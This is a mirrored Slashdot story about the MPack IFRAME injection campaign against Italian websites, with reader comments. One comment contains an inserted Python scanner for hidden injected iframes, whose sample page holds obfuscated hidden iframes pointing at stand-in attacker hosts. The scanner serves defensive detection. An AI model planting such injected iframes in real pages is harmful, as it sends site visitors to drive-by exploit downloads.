Slashdot Mirror


Malware Pulls an "Italian Job"

A number of readers sent us word about a malware attack, underway since Saturday, that began with the compromise of more than 1,100 mostly Italian Web sites. Websense claims that more than 10,000 sites have been infected by now, 80% of them in Italy. There are indications that most of the Italian sites are resident at the same large Italian hosting provider. Trend Micro reports on the attack, which is launched from a malicious IFRAME tag inserted into pages on compromised sites. For visitors to these sites, this begins a cascade of "drive-by" malware downloads if the visitor's browser or one of its helper applications has one of several targeted vulnerabilities unpatched. The first page to which visitors are redirected by the IFRAME hosts a recent version of the MPack attack kit. Panda has a month-old report on MPack (PDF) that provides copious detail about its nefarious ways.

7 of 133 comments

  1. I wish they'd count "servers" and not "sites" by Anonymous Coward · · Score: 5, Interesting

    This malware probably just affected a single DreamHost shared server, thus bringing down 10,000+ sites at once.

    But this method of artificial number inflating is to be expected from an industry trying to promote its anti-malware, anti-virus, anti-spyware, anti-trojan, anti-anti-virus, anti-rootkit products. Anyone actually requiring these craplets to be installed on their dedicated servers has a much larger problem between the keyboard and the monitor to worry about.

    1. Re:I wish they'd count "servers" and not "sites" by antic · · Score: 5, Informative

      A big, usually decent hosting company in the US that I use was getting done over by this - I had 10-20 sites infiltrated over a period of a few weeks, in 2-3 waves using two slightly different techniques. The host denied any responsibility or knowledge, saying that poor FTP passwords were the entry point. My computer was not the issue as those sites hacked were all on this host - no sites on any of the other 5 or more hosts I use were impacted, regardless of the strength of their passwords.

      Trivial passwords (single English word of five characters) were guessed as well as slightly more complicated ones (non-English words, eight characters, random numbers inserted).

      It appeared to me that, were the host NOT the problem, bots might have been guessing the passwords through brute force. I searched the net to see if I could find more information about these attacks, but there wasn't much out there, especially given that there wasn't much to search on besides the fact that they used an IFRAME or a JavaScript decode function, and a probably random set of IP addresses.

      Anyone know more about it all?

      --
      'Thats they exact same thing a banana wrench monkey.'
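The injection the summary describes (a hidden IFRAME that sends the visitor to the MPack server) and the variant antic saw (the frame written by a JavaScript "decode function") can both be hunted for in your own hosted pages. The scanner below is an added example written for this page; it is not code from the post, Websense, Trend Micro or Panda. It assumes the injected frame is hidden by zero size or CSS and points off-site, and it only unwraps three common ways of assembling the tag from script: `document.write('...')`, `document.write(unescape('...'))` and `String.fromCharCode(...)`. The sample page and every hostname in it are constructed for illustration.

```python
"""Detect injected hidden <iframe> tags of the kind used in drive-by campaigns.

Added example (not from the Slashdot post or the vendor reports it cites).
Assumptions: the injected iframe is either present as plain HTML or assembled
by script via document.write()/unescape()/String.fromCharCode(); the sample
page and its hostnames below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# CSS that hides the frame from the visitor while the browser still loads it.
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# document.write('...') or document.write(unescape('...')) with a string literal.
_DOC_WRITE = re.compile(
    r"document\.write\s*\(\s*(?:unescape\s*\(\s*)?(['\"])(.*?)\1", re.I | re.S)
# String.fromCharCode(60,105,...) style "decode functions".
_FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _js_unescape(s):
    """Decode %XX, \\xXX and \\uXXXX sequences found in a JavaScript string literal."""
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decoded_fragments(html):
    """Return the page itself plus every string a script would write into it.

    Each fragment is parsed separately because an <iframe> inside a <script>
    body is CDATA to the HTML parser and would otherwise never be seen.
    """
    frags = [html]
    frags += [_js_unescape(m.group(2)) for m in _DOC_WRITE.finditer(html)]
    frags += ["".join(chr(int(c)) for c in m.group(1).split(",") if c.strip())
              for m in _FROM_CHAR_CODE.finditer(html)]
    return frags


def _tiny(value):
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 2


def is_hidden(attrs):
    """True when the iframe would not be visible to a human visitor."""
    return (_tiny(attrs.get("width")) or _tiny(attrs.get("height"))
            or bool(_HIDDEN_STYLE.search(attrs.get("style", ""))))


def find_suspicious_iframes(html, site_host):
    """Hidden iframes whose src points to a host other than the page's own."""
    hits = []
    for frag in decoded_fragments(html):
        p = _IframeCollector()
        p.feed(frag)
        p.close()
        for attrs in p.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            if host and host != site_host.lower() and is_hidden(attrs):
                hits.append({"src": src, "host": host})
    return hits


# Constructed sample page standing in for a compromised site (hosts are made up).
# Only the last three frames should be reported: the first is same-site, the
# second is a visible embed; the third is plain HTML, the fourth is written via
# unescape(), the fifth via String.fromCharCode().
SAMPLE_PAGE = """<html><body>
<h1>Benvenuti</h1>
<iframe src="http://www.victim.example/banner.html" width="0" height="0"></iframe>
<iframe src="http://maps.example/embed" width="300" height="200"></iframe>
<iframe src="http://malicious.example/in.cgi?3" width=0 height=0 frameborder=0></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//second.example/x.php%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E'))</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,47,47,116,104,105,114,100,46,101,120,97,109,112,108,101,34,32,119,105,100,116,104,61,49,62))</script>
</body></html>"""

if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_PAGE, "www.victim.example"):
        print("suspicious hidden iframe ->", hit["src"])
```

Run it over a dump of the document root (one `find_suspicious_iframes(open(f).read(), host)` per file) and treat any hit as a compromised page; also grep the same files for `document.write` calls the decoder does not unwrap, since attackers change the wrapper far more often than the iframe itself.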
  2. Re: Viruses/Viri/Virii by beav007 · · Score: 5, Informative

    From http://en.wikipedia.org/wiki/Virii:

    In the English language, the standard plural of virus is viruses. This is the most frequently occurring form of the plural, and refers to both a biological virus and a computer virus.

    The less frequent variations viri and virii are virtually unknown in edited prose, and no major dictionary recognizes them as alternative forms. Their occurrence can be variously attributed to hypercorrection formed by analogy to Latin plurals such as alumni or false analogy to Latin plurals such as radii; idiosyncratic use as jargon among a group, such as computer hackers; and deliberate word play, such as on BBSs (see, e.g.: leet).

    Yes, viri/virii is incorrect (for now), but when the vast majority of us don't RTFA (or can't, due to the /. effect), you can hardly expect people to figure it out all on their own ;)
  3. Re:Why do they never come right out and say... by Anonymous Coward · · Score: 5, Insightful

    "The day your favorite OS dominates the market, it'll be pwned, don't you worry."

    If market share is any indication of being pwned, then why isn't Apache attacked more than IIS? According to Netcraft, Apache has 53.76% of the market compared to MS: 31.83%.

    And I say this as 1) a Firefox fan, hoping that it never gets to be the majority browser for precisely that reason, and

    I personally only want FF to have enough of the market; just enough to make companies follow the web standards, i.e. not catering to only one browser. Actually, the same applies to ODF; just enough to make companies not require a specific Office Suite.

    "2) a fan of all the OS's. I use Windows for my desktops, Linux for my servers, and Mac sometimes to play."
    Use whatever works for you.

  4. Mafia spam? by Tablizer · · Score: 5, Funny

    As a sign of this, I just got a spam that insisted I purchase a lower mortgage, along with a photo of a horse head.

  5. It's all Microsoft vulnerabilities by Animats · · Score: 5, Informative

    Note that Trend Micro never uses the word "Microsoft". That's deceptive. How does Microsoft manage that? This attack depends entirely on vulnerabilities in Internet Explorer and Microsoft Media Player. It does try to attack Firefox and Opera browsers by sending them Windows Media files, but doesn't have a direct attack on either browser.

    So:

    1. Use Firefox.
    2. Go to Tools->Options->Content->Manage File Types. Go down the list, and remove or change all entries that automatically invoke Microsoft applications. (Use OpenOffice for .doc, .xls, and .ppt, maybe QuickTime for video files.)
    1. Re:It's all Microsoft vulnerabilities by weicco · · Score: 5, Insightful

      Even simpler:

      1. Run Windows Update
      --
      You don't know what you don't know.